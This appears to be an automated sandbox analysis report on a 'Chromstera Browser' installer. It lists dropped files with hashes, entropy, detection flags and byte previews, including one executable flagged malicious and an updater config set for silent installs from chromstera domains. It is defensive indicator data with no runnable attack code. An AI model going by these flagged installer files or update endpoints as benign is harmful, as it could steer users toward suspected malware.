                                                                                                                                                                            Preview:...@IXOS.@.....@nq\Y.@.....@.....@.....@.....@.....@......&.{441BEFA6-D7B1-4C8C-8CF9-5A4D6215E43D}..Chromstera Browser..Chromnius-Main.msi.@.....@.....@.....@........&.{2BF917DE-5B34-453F-A1C8-08CE02C334FC}.....@.....@.....@.....@.......@.....@.....@.......@......Chromstera Browser......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]....AI_RemoveAllTempFilesL...AI_RemoveAllTempFiles.@......@S..MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......W..............................................._..............................Q......9...........Rich...........PE..L...A>.d.........."!...$..................... ...............................P.......I....@.....................................<.... ..................@=...0..\.......p...................@...........@............ ...............................text...V........................... ..`.rdata....... .
                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1204192
                                                                                                                                                                            Entropy (8bit):6.449430745026756
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24576:/XFkJPR8H1NQYAhx2S/RHDml5iOMmN4pL8:/XFkJs12YAhx2S/pml5inmN4pL8
                                                                                                                                                                            MD5:427C459E138B4F33819558D451E8500E
                                                                                                                                                                            SHA1:199EC0199C561D9609A181E069491EC4DC3AB92A
                                                                                                                                                                            SHA-256:423E92B04D0C600B88A18E152CCF4912D174FC4522175199860885533BA447DB
                                                                                                                                                                            SHA-512:46BBBE35C7446267AEAE1049794AA0B64DEBD8FE1CD1AD3BE2999FAC9D6C2DA1554617CC1CA16430F1409B281AD522D1BEF276EF9DB98897D3A2268F039FACF7
                                                                                                                                                                            Malicious:true
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):516
                                                                                                                                                                            Entropy (8bit):5.293699088089054
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:1OSMctbmwGsYiDSm8HCVLNvtgtjqszNXK3LXWizeYW8U4+3sfc:1E4TYiDVLNYWi8Bqzm+3Yc
                                                                                                                                                                            MD5:EF5B8581D83F4E015AB625D85822A5E2
                                                                                                                                                                            SHA1:2D41A9FC3688629A591C128F3F48A4E786E8C271
                                                                                                                                                                            SHA-256:6DA817E79DF464811593D8DD587F38FE36902EE5C74132384BB5AAA049DB4FE5
                                                                                                                                                                            SHA-512:9809C0503A56612672C4A5B613467D0510E71129AA7361F58A56FD220E40947254FD2AEDDE21BD96D868D4B7B61D8CC562210E113BEC590B6084BBED583F5276
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:[General]..Flags=NoDisableAutoCheck|PerMachine|NoUpdaterInstallGUI..AppDir=C:\Program Files (x86)\Chromstera Browser\..ApplicationName=Chromstera Browser..CompanyName=Chromstera Solutions..ApplicationVersion=1.0.0.0..DefaultCommandLine=/silentall -nofreqcheck..URL1=https://chromsteraupdates.com/download/updates.txt..CheckFrequency=1..DownloadsFolder=C:\ProgramData\Chromstera Solutions\Chromstera Browser\updates\..ID={F82AF5DB-E99C-41D4-AAE0-B8E22E7D0F21}..URL=https://chromsterabrowser.com/download/updates.txt..
                                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1310720
                                                                                                                                                                            Entropy (8bit):1.3277084320389847
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrX:KooCEYhgYEL0In
                                                                                                                                                                            MD5:0E3BC5BE8C22464C1F12188F446148FF
                                                                                                                                                                            SHA1:739A91042848EFA9928911EAC0EB2AA0261C9CF7
                                                                                                                                                                            SHA-256:D12B9CD5A5486402B228F1F16A02B825275BB805F6B8980A764A5EE39BBC8B4E
                                                                                                                                                                            SHA-512:27C6FDB59FB31D6EF10F84E11D08340782C2402C21C47610174A979321DF2FF4B765AB390DCD19F5B71940DD818447518DC2854C151CD6149A2663DE549FA915
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0x75276603, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1310720
                                                                                                                                                                            Entropy (8bit):0.4221795702959578
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:1536:pSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:paza/vMUM2Uvz7DO
                                                                                                                                                                            MD5:1B505D9D3BC3F93C377A118C2BE36891
                                                                                                                                                                            SHA1:1085AB6E7CD5BE9DC883002297385B29D9F4102C
                                                                                                                                                                            SHA-256:10E097FA4CB29FDE03C7AD7772A65C7EB5689EC25C19DCF592919196D86987D7
                                                                                                                                                                            SHA-512:A29817739CC9BEB726F882BFB905CF790E1F55A8064CDACCB3AC28A769B8DF7E8D19DE62417661738E515785CBA811D3DEC8C3F308A1ED077EA4496812EB5773
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):16384
                                                                                                                                                                            Entropy (8bit):0.07689791902081947
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:IyEYepWudajn13a/8nuxllollcVO/lnlZMxZNQl:I5zpWSa53quOAOewk
                                                                                                                                                                            MD5:257179BF8851FA13DF902733E3516D62
                                                                                                                                                                            SHA1:414EC3CCECF232E3AF6B9B79E4DE3A1EF325A07E
                                                                                                                                                                            SHA-256:BD3653DCDD8C0A1BAB85703F00BA209C12795E941FF8293A3A7E6C309E1CECC3
                                                                                                                                                                            SHA-512:8A12B9B6638BD3CC0699B339A9E5D652A953CCAF5058EEE40E373E512FD7C901AE96CBD9A3EA68BA7C6C96D6743595787BE64D5BCD3329B02ED6343F59DD747B
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):71954
                                                                                                                                                                            Entropy (8bit):7.996617769952133
                                                                                                                                                                            Encrypted:true
                                                                                                                                                                            SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                                                                                                            MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                                                                                                            SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                                                                                                            SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                                                                                                            SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):328
                                                                                                                                                                            Entropy (8bit):3.1121829603338513
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6:kKF/L9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:liDnLNkPlE99SNxAhUe/3
                                                                                                                                                                            MD5:1A7E003CBAFD58EEBEFF13A869286CCF
                                                                                                                                                                            SHA1:ACC52B68ADD41D3BEDA9523BFEBE81AA3B2753F2
                                                                                                                                                                            SHA-256:4EB34746A6C05E77813250696E5460631B09BF7F059F75B413CFF7416E72EBD1
                                                                                                                                                                            SHA-512:CD5CB5ECE3273F7B3C08900F770D19608128FB4318D0ABB086256AE1F0DB50A3C4DC2991F7D9C650D739A7509C2FB2BB4A18C36A1B86DE0CC6256CF8CF9E52A8
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:p...... ........rd..d)..(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):64
                                                                                                                                                                            Entropy (8bit):0.34726597513537405
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:Nlll:Nll
                                                                                                                                                                            MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                            SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                            SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                            SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:@...e...........................................................
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:MS Windows icon resource - 3 icons, 48x48, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):15086
                                                                                                                                                                            Entropy (8bit):2.9169468593135157
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:96:+f+OFx/DgstjfDaf///////aorGbaX8PSccl1q12xfnW1orsKc:+WqDgOQ///////aoZsP+/qAVnWursKc
                                                                                                                                                                            MD5:1E80DE80CEFEE55D7CFDA0DF2EDCF3B2
                                                                                                                                                                            SHA1:6E567D732354BBB21F9A57BBB72730C497F35380
                                                                                                                                                                            SHA-256:4E64F4E40D8CBFF082B37186C831AF4B49E3131C62C00A0CF53E0A6E7E24AC2B
                                                                                                                                                                            SHA-512:5EFEA023B18FFD5B87A19837BA2C72C179B55B7C3071B773A032C63D7268DBE25E2902AE8B111AD83A4F005346B378C7A75033ADAEE90805BCB4FEC2822E54C0
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:MS Windows icon resource - 3 icons, 48x48, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):15086
                                                                                                                                                                            Entropy (8bit):2.7901346596966383
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:+n5lkX/1//AJffffPTb6ylHJxnSfFN5pM2C:+5lkX/K
                                                                                                                                                                            MD5:FD64F54DB4CBF736A6FC0D7049F5991E
                                                                                                                                                                            SHA1:24D42FB471AAA7BCD54D7CCB36480F5ADD9B31D4
                                                                                                                                                                            SHA-256:C269353D19D50E2688DB102FEF8226CA492DB17133043D7EB5420EE8542D571C
                                                                                                                                                                            SHA-512:EC622AFAB084016F144864967A41D647E813282CB058F0F11E203865C0C175BA182E325A6D5164580FF00757C8475B61DE89CCC8E892E1B030E51B03AD4EAFB4
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):211776
                                                                                                                                                                            Entropy (8bit):6.545789465666009
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3072:APFAhETm5/VCZCuRspcZ2XcIQISCXOtwypRnWmomS7/Br5vEgn/Zr/e:bim5/VJuRLXDCXObptI/p5vD12
                                                                                                                                                                            MD5:6CE8F1D957A3545827ABA750E2087548
                                                                                                                                                                            SHA1:4EF30873A3A4CD2138320A3AECF9C0235F2993A9
                                                                                                                                                                            SHA-256:6DE3B9B00849AB2398B36446B16E7A435CDBF8610B31FFD36E381636DC33E3A8
                                                                                                                                                                            SHA-512:030E400A759B4F4B972D92BFCA8771A90BD87DE8C93B8BAD99B814563D52CC97703A0C21DFAA4D022D2111CCD77F9144D028F2016C66F3429E59589A8B390DB9
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                                            • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                                                                                            • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;.R...<...<...<...?.u.<...9...<..8.n.<..?.l.<...8.i.<..9.K.<...:.~.<...=.n.<...=...<.f.5.g.<.f.<.~.<.f..~.<....~.<.f.>.~.<.Rich..<.................PE..L....=.d.........."!...$.0...........2.......@...............................0............@.................................H...x.......x...............@=......x......p............................E..@............@..........@....................text...]/.......0.................. ..`.rdata.......@.......4..............@..@.data...............................@....rsrc...x...........................@..@.reloc..x........ ..................@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 500x59, components 3
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):4502
                                                                                                                                                                            Entropy (8bit):7.593476384016539
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:96:gf2mCSVa8l5M3QXr1yFk1Erk/Sp3ErJE97KT6Avg+y5rls/Xx:I88oAXQk1Erk/Sp3ErcAvBy/wh
                                                                                                                                                                            MD5:D5A55A78CD38F45256807C7851619B7D
                                                                                                                                                                            SHA1:9D8269120D1D096E9AB0192348F3B8F81F5F73D9
                                                                                                                                                                            SHA-256:BE83C8592906FD9651634B0823A2F45ABE96AAE082674568944C639B5B4A95DC
                                                                                                                                                                            SHA-512:959E7410E3006CFEF9D14315E8741E34B6E81C4F9160C5D66F3ABD77CE72F55F907AB3A0E500780B5C0E0E017E8639F135CC258976B4AB4B9D1AAED6242CE9F1
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:......JFIF..............Ducky.......<.....}http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c006 79.dabacbb, 2021/04/14-00:39:44 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="3F35745A47965A573D5A396B9C00A40A" xmpMM:DocumentID="xmp.did:12B5C5D7C43111EB81D1C3E968FDC210" xmpMM:InstanceID="xmp.iid:12B5C5D6C43111EB81D1C3E968FDC210" xmp:CreatorTool="Adobe Photoshop CC (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:268ff5cb-d2ed-6d49-9e2f-bcda4eb9e534" stRef:documentID="adobe:docid:photoshop:00a5e90d-efab-ed45-b550-e54ac9ab0589"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...C........................................................ "..".
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 625x74, components 3
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):5714
                                                                                                                                                                            Entropy (8bit):7.427515682473523
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:96:g8h6ZVa8lNgYZMlOIdrPf1XkgrieyIGkJcFm2qkC:Z18MYmQ27lDGLLqkC
                                                                                                                                                                            MD5:479576299075C0B85E0DE2AFE4040C25
                                                                                                                                                                            SHA1:3FF55DD79D8E4CAFA2F8755C90D14524DC75C8EE
                                                                                                                                                                            SHA-256:3C081097DCA98557B27C1949496CEDC94F1B8F6A952D6B106E312E0239BC5B21
                                                                                                                                                                            SHA-512:32C30E0B8AD608639182F5BE3A4064B15D35975D7E920E9A0B020F9F0CF32C81B6CD33E63240B828800AD2452E3A28330666C3D584ECEB1D45C2DD25E2F0E19A
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:......JFIF..............Ducky.......<.....}http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c006 79.dabacbb, 2021/04/14-00:39:44 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="3F35745A47965A573D5A396B9C00A40A" xmpMM:DocumentID="xmp.did:4307CEF6C43611EBAC93D939A9EF7781" xmpMM:InstanceID="xmp.iid:4307CEF5C43611EBAC93D939A9EF7781" xmp:CreatorTool="Adobe Photoshop CC (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:527f7179-62ac-ab45-8182-1dce9a7722ea" stRef:documentID="adobe:docid:photoshop:ca709772-3d5f-cc4c-9d43-6e0acd2d058f"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...C........................................................ "..".
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 938x111, components 3
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):9319
                                                                                                                                                                            Entropy (8bit):7.352172078179043
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:Pp8Szx7Uw+7PL209joqlIZ6remeV81MCoOLqTrz:Pp8WJj8L209rKyp3qVOLqfz
                                                                                                                                                                            MD5:A766139160C43AF73563ADBD3A38BD5F
                                                                                                                                                                            SHA1:37A3817C61ED5516B6BBFE4D6CC458E166CE4D0A
                                                                                                                                                                            SHA-256:0416B1888148611C4716CBBE253C8F73F075E4F926C3CC4F93D38D230EF7B4A1
                                                                                                                                                                            SHA-512:B358D75846A7DEDB32640887C2DD45EDFB1A0D9A4A8735E6446E101FC1778A0E5625B40C3108AFF1A79BFFD2AA92175BD5A75BF70D1F3B30582033B5BB68FE63
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:......JFIF..............Ducky.......<.....}http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c006 79.dabacbb, 2021/04/14-00:39:44 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="3F35745A47965A573D5A396B9C00A40A" xmpMM:DocumentID="xmp.did:754F24FEC43611EBA0F3E80E8A722147" xmpMM:InstanceID="xmp.iid:754F24FDC43611EBA0F3E80E8A722147" xmp:CreatorTool="Adobe Photoshop CC (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:9ed5958a-829f-8d41-819e-bb85dbea462c" stRef:documentID="adobe:docid:photoshop:69d85e66-65a5-be4b-a47a-755d1e30ff1e"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...C........................................................ "..".
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1875x222, components 3
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):22946
                                                                                                                                                                            Entropy (8bit):6.920504108797511
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:384:I8gCPeBbgnF6tldimQ4PWuug1S2iwoIy/SPO7sfvzoFVmft7LHlwor:I83WBbQF6rUg1S2iww/Afv0FVml7ior
                                                                                                                                                                            MD5:38AD4B10AC19A240D93E04D383822381
                                                                                                                                                                            SHA1:4AF7AD089328DCCCDDA6886A94D7E7CD638F359F
                                                                                                                                                                            SHA-256:033171062CD540EC84CE4998719D0DCAE564AA69646D437DC4DC4CD8EFD0F6FA
                                                                                                                                                                            SHA-512:6FAEDB94FAB28C896B95E36C6A2C8E9B42BC41AB1650F2A6E2175B70511C0881448796F62760FFB3DD49B95048C6C45FFD68C73225AF5F2EC9A1003C59E6984E
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:......JFIF..............Ducky.......<.....}http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c006 79.dabacbb, 2021/04/14-00:39:44 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="3F35745A47965A573D5A396B9C00A40A" xmpMM:DocumentID="xmp.did:8DC6B99CC43611EBB055D3E33959867C" xmpMM:InstanceID="xmp.iid:8DC6B99BC43611EBB055D3E33959867C" xmp:CreatorTool="Adobe Photoshop CC (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:6dc45cf6-c34f-e34b-a9ec-e44001e82373" stRef:documentID="adobe:docid:photoshop:08f061d6-4477-2940-952a-017ed102d655"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...C........................................................ "..".
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):28870
                                                                                                                                                                            Entropy (8bit):4.29697375737841
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:768:0PQxoVfMd6xviLJGSinZ1IHVRe0lnh/dbsX5JS:0Ja64sSQZ1IAJY
                                                                                                                                                                            MD5:A92209231C43A871925D546C6DC5C244
                                                                                                                                                                            SHA1:15B5F39938FF9718EEF83862F4EE1F6E7272E1D3
                                                                                                                                                                            SHA-256:865B031B2C344B5558F7712E1424251631247C86A7D835AE263AD948016A35A0
                                                                                                                                                                            SHA-512:B6C817AECA982C1FD11BCAF7D59E20E3E0BE34FBE8E37AB8223FD240A3E96135218BFCA6379F966FF3A22AF795FFBBF5A94FF0FB0219A19D1FDDA4321EDA2659
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?>.. Generator: Adobe Illustrator 25.2.3, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->..<svg version="1.1" id="Layer_8" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px"... viewBox="0 0 500 59" enable-background="new 0 0 500 59" xml:space="preserve">..<rect x="-0.3" display="none" fill="#FFFFFF" width="500.4" height="59"/>..<linearGradient id="SVGID_1_" gradientUnits="userSpaceOnUse" x1="452.55" y1="72.994" x2="452.55" y2="1.6686" gradientTransform="matrix(1 0 0 -1 0 60)">...<stop offset="0.0017" style="stop-color:#06409A"/>...<stop offset="0.1268" style="stop-color:#133F96"/>...<stop offset="0.358" style="stop-color:#353D8C"/>...<stop offset="0.6699" style="stop-color:#6C397C"/>...<stop offset="1" style="stop-color:#AE3569"/>..</linearGradient>..<rect x="405.1" fill="url(#SVGID_1_)" width="94.9" height="59"/>..<g opacity="0.15">.......<linearGradient id="SVGID_2_" gradientUnits="userSpaceO
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:MS Windows icon resource - 3 icons, 16x16, 16 colors, 4 bits/pixel, 16x16, 8 bits/pixel
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):2862
                                                                                                                                                                            Entropy (8bit):3.160430651939096
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:48:QFFZ+f+zd+kHeNTM9/+Xz++++++++YWWS0i6I:QFFEw4Xc+D++++++++ypi9
                                                                                                                                                                            MD5:983358CE03817F1CA404BEFBE1E4D96A
                                                                                                                                                                            SHA1:75CE6CE80606BBB052DD35351ED95435892BAF8D
                                                                                                                                                                            SHA-256:7F0121322785C107BFDFE343E49F06C604C719BAFF849D07B6E099675D173961
                                                                                                                                                                            SHA-512:BDEE6E81A9C15AC23684C9F654D11CC0DB683774367401AA2C240D57751534B1E5A179FE4042286402B6030467DB82EEDBF0586C427FAA9B29BD5EF74B807F3E
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:MS Windows icon resource - 3 icons, 48x48, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):15086
                                                                                                                                                                            Entropy (8bit):3.57715132031736
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:48:+728OQ6YxsPq7v8N+2RdHKb80000000000000000000000000MqfqF2Nnnu8jgLe:+72LQWPq7vEFXVCVKuM4expgz
                                                                                                                                                                            MD5:C23AF89757665BC0386FD798A61B2112
                                                                                                                                                                            SHA1:FD4958B62F83EDF6774FCF7C691CC3270B82AA0B
                                                                                                                                                                            SHA-256:031ED0378F819926D7B5B2C6C9367A0FB1CBAE40E1A3959E2652FE30A47D52F2
                                                                                                                                                                            SHA-512:5727ABA9CD972C8F25B31F2A8E698CA2CAE640427A62A0EA4092FD426B907D39BAF58B8724B6E37965E76BE90EAA329F7D4A7EE4688922ED796D54E4377FC8CC
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:MS Windows icon resource - 3 icons, 48x48, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):15086
                                                                                                                                                                            Entropy (8bit):3.2912578217465134
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:48:+728OQ6UfPsw8PX4E0000000000000000000000000rggggj88jgLiqYTqfI0008:+72LQpPswSXtA4vJbvi
                                                                                                                                                                            MD5:BE6D2F48AA6634FB2101C273C798D4D9
                                                                                                                                                                            SHA1:21D1B2E7BCA49FE727E1C3A505E28E609EC53CC7
                                                                                                                                                                            SHA-256:0E22BC2BF7184DFDB55223A11439304A453FB3574E3C9034A6497AF405C628EF
                                                                                                                                                                            SHA-512:8BC2C9789640ED0E6F266FDC27647F7CE510EFE06ED1225BB8510F082E6C009E7911AEC38F21DE405FA68A418513DA2DC541EDB53F4FA6887603596EBD29F463
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 500x316, components 3
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):12626
                                                                                                                                                                            Entropy (8bit):7.450344831364431
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:zBi8rcWUMevBUahRXMHd0q3vkf6kx2DJIQ4EALOCwTx5D+CM96qdGi131:48IzMiBUaEHdp3vkCXuQ4pnH1dGiz
                                                                                                                                                                            MD5:5F6253CFF5A8B031BFB3B161079D0D86
                                                                                                                                                                            SHA1:7645B13610583FB67247C74CF5AF08FF848079E7
                                                                                                                                                                            SHA-256:36D9BAB35D1E4B50045BF902F5D42B6F865488C75F6E60FC00A6CD6F69034AB0
                                                                                                                                                                            SHA-512:D1FDC364BEDF931512000FBF05E854D5ACECCB48ABB9EC49E68476A5DC2907267490290D92ACBB267FFB7BDBA9B7A1C88F1EB77830CF953443F4624995DABDC3
                                                                                                                                                                            Malicious:false
